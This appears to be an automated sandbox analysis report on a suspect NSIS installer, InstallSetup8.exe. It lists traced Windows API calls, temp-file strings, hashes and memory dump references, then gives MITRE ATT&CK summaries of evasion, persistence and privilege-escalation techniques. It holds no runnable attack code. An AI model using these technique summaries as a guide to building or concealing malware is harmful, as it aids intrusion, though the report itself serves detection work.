Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp\nsn8FCF.tmp, xrefs: 00401826, 00401844
C:\Users\user\AppData\Local\Temp, xrefs: 004017A3
C:\Users\user\AppData\Local\Temp\nsn8FCF.tmp\INetC.dll, xrefs: 0040183A, 00401856

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe$C:\Users\user\AppData\Local\Temp\nsn8FCF.tmp$C:\Users\user\AppData\Local\Temp\nsn8FCF.tmp\INetC.dll
API String ID: 1941528284-577877219
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B
nsa, xrefs: 00406083

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,C:\Users\user\AppData\Local\Temp\nsn8FCE.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED

SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401645

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-47812868
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1B Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406022: GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
Part of subcall function 00406022: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C36
DeleteFileW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C3E
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E

Uniqueness

Uniqueness Score: -1.00%

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Uniqueness

Uniqueness Score: -1.00%

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 0000000D.00000002.3069420604.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3068986283.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3069816740.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000431000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3070111472.0000000000440000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000D.00000002.3071683085.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

